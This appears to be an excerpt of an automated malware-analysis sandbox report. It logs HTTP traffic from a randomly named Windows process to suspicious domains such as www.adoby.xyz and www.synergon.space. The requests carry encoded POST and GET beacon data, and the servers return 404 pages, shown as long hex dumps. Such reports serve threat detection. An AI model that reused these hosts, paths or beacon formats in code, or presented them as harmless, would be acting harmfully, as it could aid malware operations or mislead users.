                                                  Data Raw: 77 64 39 38 58 4a 70 3d 4d 74 55 32 4d 43 74 4d 4b 61 66 4c 79 57 32 76 51 37 43 42 74 57 6a 70 61 49 31 69 79 52 51 55 44 44 32 47 6f 2f 33 77 6f 70 49 51 79 4a 7a 77 6f 32 6a 4b 35 57 65 4e 66 61 79 56 6e 56 7a 70 37 45 47 6f 62 52 43 33 67 68 65 50 71 4d 4b 51 79 63 46 45 36 4d 66 53 77 70 7a 6c 2f 33 6d 74 73 54 4c 61 62 52 34 65 5a 50 51 6e 51 36 56 30 71 75 41 7a 7a 4e 66 41 71 6f 32 67 70 5a 4a 6e 69 76 75 73 58 6c 52 78 76 64 53 54 39 6b 69 50 7a 56 34 6f 66 68 50 52 39 7a 69 43 4f 36 4a 4c 52 49 37 46 4b 6f 47 61 70 45 61 6b 34 70 37 34 68 43 4b 62 30 5a 58 44 74 5a 67 59 71 59 4d 74 6a 73 73 64 34 73 68 33 49 33 44 77 2b 4e 50 2b 71 6e 34 52 68 42 35 34 6b 78 4e 37 31 58 49 36 66 41 58 48 34 75 7a 78 68 62 44 63 34 68 44 6d 73 74 63 57 65 51 61 31 78 48 6d 45 6e 61 4e 77 77 68 70 76 45 53 42 39 68 4a 77 6c 71 4a 51 4e 75 6d 75 4f 75 76 65 56 72 58 4c 72 63 6f 57 7a 50 35 77 45 53 2b 6f 77 6e 58 52 55 6d 4f 59 47 7a 51 64 65 30 63 47 51 43 38 6e 35 6c 32 63 6a 48 47 6e 34 70 68 42 50 6e 75 [TRUNCATED]
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyW2vQ7CBtWjpaI1iyRQUDD2Go/3wopIQyJzwo2jK5WeNfayVnVzp7EGobRC3ghePqMKQycFE6MfSwpzl/3mtsTLabR4eZPQnQ6V0quAzzNfAqo2gpZJnivusXlRxvdST9kiPzV4ofhPR9ziCO6JLRI7FKoGapEak4p74hCKb0ZXDtZgYqYMtjssd4sh3I3Dw+NP+qn4RhB54kxN71XI6fAXH4uzxhbDc4hDmstcWeQa1xHmEnaNwwhpvESB9hJwlqJQNumuOuveVrXLrcoWzP5wES+ownXRUmOYGzQde0cGQC8n5l2cjHGn4phBPnurPwNRHGLj30NBr2IWYYxX4dY5GjBcLANATZJhTYSDOSJbmnxw3u4xXMvCnBnWByGk6DW7ZlTuN+lzmIaf/12ohrfTJ6rm6wi2N0pyCC2hFo0kqQzEr+oDAvhN7xLWHSonGAcjYIQx5/QjuObYMV2QHsMjerYnZ0A8OJBrV+8jqPN2fft0tQCgoCgeItYbn2gDOOO/61kSNxs7LRZHigLvqTsJnczAv6KcVWdDH+y/34X2j0z86Y03opLaQtE2wJGp/L9Dj5dPDU5cdRvHfEGFRvJfDCnvHOSkuYtVWc1RLLDOxRJnzStnDkCXy9nWBCvZUQ/O99JCrIsyifvAM8+BWv5yFnnEzFWjRbyOrpk2e9J8Ps/q3TNinSz0DZBbkhPbVh4vmdNaC8tTdnrgUc/UdhJey6wvZnqbeXmUaDjjgFpXCfSjr5YPQ14ZxgVQfNzraPs/qagSlrG8YnZHbdzDK7md1v3WLKLgjhjhT0CQnwf3WOw0QWgyvX6myYTEmVDuydJaIl8Hk5aEMA96sUFiFj+HVDIJQ2xvztpodSywIebc3nMqFU41HG1YSKbIhnzfxgXicQVsUZcn5Kmsg3cUEtwjeNhpavdABoMmwxBYjxdDZzENzJSDxFTey35v58qrrdXDHQxVrlYFX15sBEZ1Tv8IC0jZ/UZ/X [TRUNCATED]
                                                  Jul 2, 2024 14:08:37.136504889 CEST1043INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:37 GMT
                                                  server: LiteSpeed
                                                  Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                  Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.449761109.95.158.127801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:39.009480953 CEST501OUTGET /zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.synergon.space
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:08:39.670222044 CEST1236INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 2247
                                                  date: Tue, 02 Jul 2024 12:08:39 GMT
                                                  server: LiteSpeed
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje si aden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]
                                                  Jul 2, 2024 14:08:39.670331001 CEST1200INData Raw: 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 66 3a 68 6f 76 65 72 2c 20 2e 66 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 32 30 32 30 32 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d
                                                  Data Ascii: n:none;}.f:hover, .f:active{color:#202020;text-decoration:underline;}</style></head><body><div style="text-align:center;"><a href="https://dhosting.pl" rel="nofollow"><img src="https://dhosting.pl/img/logo.svg" alt="dho


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.449762162.0.213.72801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:58.056879044 CEST759OUTPOST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 51 50 4c 34 6a 49 50 57 65 4d 74 70 71 35 33 45 4d 67 76 57 43 4b 36 70 6d 76 48 71 55 4a 31 72 43 49 74 52 4a 69 6a 67 63 49 55 41 69 66 78 2b 7a 5a 59 54 37 65 67 2f 72 74 6b 43 4b 6e 75 59 47 4d 61 47 44 53 70 36 4c 57 55 5a 57 7a 71 2b 48 4b 41 42 4e 4a 2b 36 61 6f 65 4f 6d 38 33 45 65 58 30 5a 70 55 78 53 67 41 44 49 44 6d 4d 45 79 79 4e 51 6f 36 57 73 6b 42 59 67 4b 78 34 75 34 49 35 38 78 31 66 76 42 42 77 77 34 4f 6f 30 41 62 6b 53 54 46 4c 56 4f 41 6e 4e 42 36 37 50 2b 72 68 57 49 72 2b 6d 2f 69 64 58 6e 69 4a 48 34 59 78 36 51 76 31 6b 78 35 4d 50 45 35 43 67 44 67 3d 3d
                                                  Data Ascii: wd98XJp=QPL4jIPWeMtpq53EMgvWCK6pmvHqUJ1rCItRJijgcIUAifx+zZYT7eg/rtkCKnuYGMaGDSp6LWUZWzq+HKABNJ+6aoeOm83EeX0ZpUxSgADIDmMEyyNQo6WskBYgKx4u4I58x1fvBBww4Oo0AbkSTFLVOAnNB67P+rhWIr+m/idXniJH4Yx6Qv1kx5MPE5CgDg==
                                                  Jul 2, 2024 14:08:58.662834883 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:08:58 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                  Jul 2, 2024 14:08:58.662856102 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                  Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                  Jul 2, 2024 14:08:58.662866116 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                  Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                  Jul 2, 2024 14:08:58.662911892 CEST672INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                  Jul 2, 2024 14:08:58.662962914 CEST1236INData Raw: 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 22 20 79 32 3d 22 34 39 33 2e 37 31 33 22 20
                                                  Data Ascii: limit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0620" stroke-wid
                                                  Jul 2, 2024 14:08:58.663054943 CEST1236INData Raw: 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b
                                                  Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fil
                                                  Jul 2, 2024 14:08:58.663064003 CEST1236INData Raw: 36 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69
                                                  Data Ascii: 6" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g>
                                                  Jul 2, 2024 14:08:58.663073063 CEST672INData Raw: 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 33 33 2e 33 34 33 22 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22
                                                  Data Ascii: cap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy=
                                                  Jul 2, 2024 14:08:58.666016102 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                  Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                  Jul 2, 2024 14:08:58.666028023 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                  Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                                                  Jul 2, 2024 14:08:58.667788982 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                                                  Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.449763162.0.213.72801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:00.595741034 CEST779OUTPOST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 51 50 4c 34 6a 49 50 57 65 4d 74 70 6c 34 48 45 44 6e 62 57 48 71 36 32 6a 76 48 71 66 70 31 6e 43 50 6c 52 4a 6e 43 6c 63 37 77 41 6a 39 35 2b 79 64 45 54 38 65 67 2f 67 4e 6b 44 58 33 75 44 47 4e 6e 37 44 54 35 36 4c 57 51 5a 57 7a 61 2b 48 5a 59 65 4e 5a 2b 38 47 6f 65 4d 35 73 33 45 65 58 30 5a 70 55 56 34 67 44 7a 49 44 58 38 45 7a 57 68 52 68 61 57 7a 30 68 59 67 41 68 34 31 34 49 35 6b 78 30 54 42 42 44 34 77 34 4c 55 30 41 4b 6b 52 59 46 4c 66 54 77 6e 54 43 72 4f 30 6b 59 6b 5a 4b 64 54 41 34 54 52 6d 6d 6b 59 64 70 70 51 74 43 76 52 58 73 2b 46 37 4a 36 2f 70 59 75 49 68 7a 67 47 49 4f 52 69 5a 53 66 6c 70 4e 6a 2b 35 35 6a 45 3d
                                                  Data Ascii: wd98XJp=QPL4jIPWeMtpl4HEDnbWHq62jvHqfp1nCPlRJnClc7wAj95+ydET8eg/gNkDX3uDGNn7DT56LWQZWza+HZYeNZ+8GoeM5s3EeX0ZpUV4gDzIDX8EzWhRhaWz0hYgAh414I5kx0TBBD4w4LU0AKkRYFLfTwnTCrO0kYkZKdTA4TRmmkYdppQtCvRXs+F7J6/pYuIhzgGIORiZSflpNj+55jE=
                                                  Jul 2, 2024 14:09:01.199984074 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:01 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                  Jul 2, 2024 14:09:01.200006962 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                  Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                  Jul 2, 2024 14:09:01.200025082 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                  Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
